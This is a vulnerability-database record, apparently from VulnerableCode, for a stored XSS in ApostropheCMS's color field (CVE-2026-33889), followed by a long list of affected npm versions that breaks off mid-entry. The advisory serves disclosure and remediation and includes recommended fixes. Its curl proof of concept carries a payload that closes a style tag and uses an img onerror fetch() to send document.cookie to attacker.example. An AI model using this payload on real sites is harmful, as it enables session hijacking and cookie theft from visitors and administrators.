{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89391?format=json","vulnerability_id":"VCID-4twt-e5vw-m3em","summary":"ApostropheCMS: Stored XSS via CSS Custom Property Injection in @apostrophecms/color-field Escaping Style Tag Context\n## Summary\n\nThe `@apostrophecms/color-field` module bypasses color validation for values prefixed with `--` (intended for CSS custom properties), but performs no HTML sanitization on these values. When styles containing attacker-controlled color values are rendered into `<style>` tags — both in the global stylesheet (editors only) and in per-widget style elements (all visitors) — the lack of escaping allows an editor to inject `</style>` followed by arbitrary HTML/JavaScript, achieving stored XSS against all site visitors.\n\n## Details\n\n**Root Cause 1: Validation bypass in color field** (`modules/@apostrophecms/color-field/index.js:36`)\n\nThe color field's `convert` method uses TinyColor to validate color values, but exempts any value starting with `--`:\n\n```javascript\n// modules/@apostrophecms/color-field/index.js:26-38\nasync convert(req, field, data, destination) {\n  destination[field.name] = self.apos.launder.string(data[field.name]);\n  // ...\n  const test = new TinyColor(destination[field.name]);\n  if (!test.isValid && !destination[field.name].startsWith('--')) {\n    destination[field.name] = null;\n  }\n},\n```\n\nA value like `--x: red}</style><script>alert(document.cookie)</script><style>` passes validation because it starts with `--`. The `launder.string()` call performs type coercion only — it does not strip HTML metacharacters like `<`, `>`, or `/`.\n\n**Root Cause 2a: Unescaped rendering in widget styles (public path)** (`modules/@apostrophecms/styles/lib/methods.js:232-234`)\n\nThe `getWidgetElements()` method concatenates the CSS string directly into a `<style>` tag:\n\n```javascript\n// modules/@apostrophecms/styles/lib/methods.js:232-234\nreturn `<style data-apos-widget-style-for=\"${widgetId}\" data-apos-widget-style-id=\"${styleId}\">\\n` +\n  css +\n  '\\n</style>';\n```\n\nThis is then marked as safe HTML via `template.safe()` in the helpers (`modules/@apostrophecms/styles/lib/helpers.js:17-20`), and rendered for **all visitors** on any page containing a styled widget (`modules/@apostrophecms/widget-type/index.js:426-432`).\n\n**Root Cause 2b: Unescaped rendering in global stylesheet (editor path)** (`modules/@apostrophecms/template/index.js:1164-1165`)\n\nThe `renderNodes()` function returns `node.raw` without escaping:\n\n```javascript\n// modules/@apostrophecms/template/index.js:1164-1165\nif (node.raw != null) {\n  return node.raw;\n}\n```\n\nStyle nodes containing the malicious color values are rendered as raw HTML, affecting editors and admins who can `view-draft`.\n\n## PoC\n\n**Prerequisites:** An account with `editor` role on an Apostrophe 4.x instance. The site must have at least one piece or page type with a color field used in styles configuration.\n\n**Step 1: Authenticate and obtain a CSRF token and session cookie.**\n\n```bash\n# Login as editor\nCOOKIE_JAR=$(mktemp)\ncurl -s -c \"$COOKIE_JAR\" -X POST http://localhost:3000/api/v1/@apostrophecms/login/login \\\n  -H \"Content-Type: application/json\" \\\n  -d '{\"username\":\"editor\",\"password\":\"editor123\"}'\n\n# Extract CSRF token\nCSRF=$(curl -s -b \"$COOKIE_JAR\" http://localhost:3000/api/v1/@apostrophecms/i18n/locale/en | grep -o '\"csrfToken\":\"[^\"]*\"' | cut -d'\"' -f4)\n```\n\n**Step 2: Create or update a piece/page with a malicious color value in a styled widget.**\n\nThe exact API route depends on the site's widget configuration. For a widget type that uses a color field in its styles schema (e.g., a `background-color` style property):\n\n```bash\n# Inject XSS payload via color field in widget styles\n# The --x prefix bypasses TinyColor validation\nPAYLOAD='--x: red}</style><img src=x onerror=\"fetch(`https://attacker.example/steal?c=`+document.cookie)\"><style>'\n\ncurl -s -b \"$COOKIE_JAR\" -X POST \\\n  \"http://localhost:3000/api/v1/@apostrophecms/page\" \\\n  -H \"Content-Type: application/json\" \\\n  -H \"X-XSRF-TOKEN: $CSRF\" \\\n  -d '{\n    \"slug\": \"/xss-test\",\n    \"title\": \"Test Page\",\n    \"type\": \"default-page\",\n    \"main\": {\n      \"items\": [{\n        \"type\": \"some-widget\",\n        \"styles\": {\n          \"backgroundColor\": \"'\"$PAYLOAD\"'\"\n        }\n      }]\n    }\n  }'\n```\n\n**Step 3: Publish the page.**\n\n```bash\ncurl -s -b \"$COOKIE_JAR\" -X POST \\\n  \"http://localhost:3000/api/v1/@apostrophecms/page/{pageId}/publish\" \\\n  -H \"X-XSRF-TOKEN: $CSRF\"\n```\n\n**Step 4: Any visitor navigates to the published page.**\n\n```bash\n# As an unauthenticated visitor\ncurl -s http://localhost:3000/xss-test | grep -A2 'onerror'\n```\n\n**Expected (safe):** The color value is escaped or rejected.\n\n**Actual:** The rendered HTML contains:\n\n```html\n<style data-apos-widget-style-for=\"...\" data-apos-widget-style-id=\"...\">\n.apos-widget-style-... { background-color: --x: red}</style><img src=x onerror=\"fetch(`https://attacker.example/steal?c=`+document.cookie)\"><style>; }\n</style>\n```\n\nThe injected `</style>` closes the style tag, and the `<img onerror>` executes JavaScript in the visitor's browser.\n\n## Impact\n\n- **Stored XSS on public pages (Path B):** An editor can inject JavaScript that executes for **every visitor** to any page containing the affected widget. This enables mass cookie theft, session hijacking, keylogging, phishing overlays, and drive-by malware delivery against the site's entire audience.\n- **Privilege escalation (Path A):** An editor can steal admin session tokens from higher-privileged users viewing draft content, escalating to full administrative control of the CMS.\n- **Persistence:** The payload is stored in the database and survives restarts. It executes on every page load until the content is manually edited.\n- **No CSP mitigation:** Apostrophe does not enforce a strict Content-Security-Policy by default, so inline script execution is not blocked.\n\n## Recommended Fix\n\n**Fix 1: Sanitize color values in the color field's `convert` method** (`modules/@apostrophecms/color-field/index.js`):\n\n```javascript\n// Before (line 36):\nif (!test.isValid && !destination[field.name].startsWith('--')) {\n  destination[field.name] = null;\n}\n\n// After:\nif (!test.isValid && !destination[field.name].startsWith('--')) {\n  destination[field.name] = null;\n} else if (destination[field.name].startsWith('--')) {\n  // CSS custom property names: only allow alphanumeric, hyphens, underscores\n  if (!/^--[a-zA-Z0-9_-]+$/.test(destination[field.name])) {\n    destination[field.name] = null;\n  }\n}\n```\n\n**Fix 2: Escape CSS output in `getWidgetElements`** (`modules/@apostrophecms/styles/lib/methods.js`):\n\n```javascript\n// Before (line 232-234):\nreturn `<style data-apos-widget-style-for=\"${widgetId}\" data-apos-widget-style-id=\"${styleId}\">\\n` +\n  css +\n  '\\n</style>';\n\n// After:\nconst sanitizedCss = css.replace(/<\\//g, '<\\\\/');\nreturn `<style data-apos-widget-style-for=\"${widgetId}\" data-apos-widget-style-id=\"${styleId}\">\\n` +\n  sanitizedCss +\n  '\\n</style>';\n```\n\nBoth fixes should be applied: Fix 1 provides input validation (defense in depth at the data layer), and Fix 2 provides output encoding (preventing style tag breakout regardless of the input source).","aliases":[{"alias":"CVE-2026-33889"},{"alias":"GHSA-97v6-998m-fp4g"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/110566?format=json","purl":"pkg:npm/apostrophe@4.29.0","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@4.29.0"}],"affected_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/267830?format=json","purl":"pkg:npm/apostrophe@0.3.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.3.3"},{"url":"http://public2.vulnerablecode.io/api/packages/267831?format=json","purl":"pkg:npm/apostrophe@0.3.4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.3.4"},{"url":"http://public2.vulnerablecode.io/api/packages/267832?format=json","purl":"pkg:npm/apostrophe@0.3.5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.3.5"},{"url":"http://public2.vulnerablecode.io/api/packages/267833?format=json","purl":"pkg:npm/apostrophe@0.3.6","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.3.6"},{"url":"http://public2.vulnerablecode.io/api/packages/267834?format=json","purl":"pkg:npm/apostrophe@0.3.7","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.3.7"},{"url":"http://public2.vulnerablecode.io/api/packages/267835?format=json","purl":"pkg:npm/apostrophe@0.3.8","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.3.8"},{"url":"http://public2.vulnerablecode.io/api/packages/267836?format=json","purl":"pkg:npm/apostrophe@0.3.9","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.3.9"},{"url":"http://public2.vulnerablecode.io/api/packages/267837?format=json","purl":"pkg:npm/apostrophe@0.3.10","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.3.10"},{"url":"http://public2.vulnerablecode.io/api/packages/267838?format=json","purl":"pkg:npm/apostrophe@0.3.11","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.3.11"},{"url":"http://public2.vulnerablecode.io/api/packages/267839?format=json","purl":"pkg:npm/apostrophe@0.3.12","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.3.12"},{"url":"http://public2.vulnerablecode.io/api/packages/267840?format=json","purl":"pkg:npm/apostrophe@0.3.13","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.3.13"},{"url":"http://public2.vulnerablecode.io/api/packages/267841?format=json","purl":"pkg:npm/apostrophe@0.3.14","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.3.14"},{"url":"http://public2.vulnerablecode.io/api/packages/267842?format=json","purl":"pkg:npm/apostrophe@0.3.16","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.3.16"},{"url":"http://public2.vulnerablecode.io/api/packages/267843?format=json","purl":"pkg:npm/apostrophe@0.3.18","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.3.18"},{"url":"http://public2.vulnerablecode.io/api/packages/267844?format=json","purl":"pkg:npm/apostrophe@0.3.19","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.3.19"},{"url":"http://public2.vulnerablecode.io/api/packages/267845?format=json","purl":"pkg:npm/apostrophe@0.4.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.0"},{"url":"http://public2.vulnerablecode.io/api/packages/267846?format=json","purl":"pkg:npm/apostrophe@0.4.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.1"},{"url":"http://public2.vulnerablecode.io/api/packages/267847?format=json","purl":"pkg:npm/apostrophe@0.4.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.2"},{"url":"http://public2.vulnerablecode.io/api/packages/267848?format=json","purl":"pkg:npm/apostrophe@0.4.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.3"},{"url":"http://public2.vulnerablecode.io/api/packages/267849?format=json","purl":"pkg:npm/apostrophe@0.4.4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.4"},{"url":"http://public2.vulnerablecode.io/api/packages/267850?format=json","purl":"pkg:npm/apostrophe@0.4.5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.5"},{"url":"http://public2.vulnerablecode.io/api/packages/267851?format=json","purl":"pkg:npm/apostrophe@0.4.6","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.6"},{"url":"http://public2.vulnerablecode.io/api/packages/267852?format=json","purl":"pkg:npm/apostrophe@0.4.7","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.7"},{"url":"http://public2.vulnerablecode.io/api/packages/267853?format=json","purl":"pkg:npm/apostrophe@0.4.8","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.8"},{"url":"http://public2.vulnerablecode.io/api/packages/267854?format=json","purl":"pkg:npm/apostrophe@0.4.9","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.9"},{"url":"http://public2.vulnerablecode.io/api/packages/267855?format=json","purl":"pkg:npm/apostrophe@0.4.10","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.10"},{"url":"http://public2.vulnerablecode.io/api/packages/267856?format=json","purl":"pkg:npm/apostrophe@0.4.11","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.11"},{"url":"http://public2.vulnerablecode.io/api/packages/267857?format=json","purl":"pkg:npm/apostrophe@0.4.12","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.12"},{"url":"http://public2.vulnerablecode.io/api/packages/267858?format=json","purl":"pkg:npm/apostrophe@0.4.13","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.13"},{"url":"http://public2.vulnerablecode.io/api/packages/267859?format=json","purl":"pkg:npm/apostrophe@0.4.14","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.14"},{"url":"http://public2.vulnerablecode.io/api/packages/267860?format=json","purl":"pkg:npm/apostrophe@0.4.15","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.15"},{"url":"http://public2.vulnerablecode.io/api/packages/267861?format=json","purl":"pkg:npm/apostrophe@0.4.16","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.16"},{"url":"http://public2.vulnerablecode.io/api/packages/267862?format=json","purl":"pkg:npm/apostrophe@0.4.17","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.17"},{"url":"http://public2.vulnerablecode.io/api/packages/267863?format=json","purl":"pkg:npm/apostrophe@0.4.18","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvg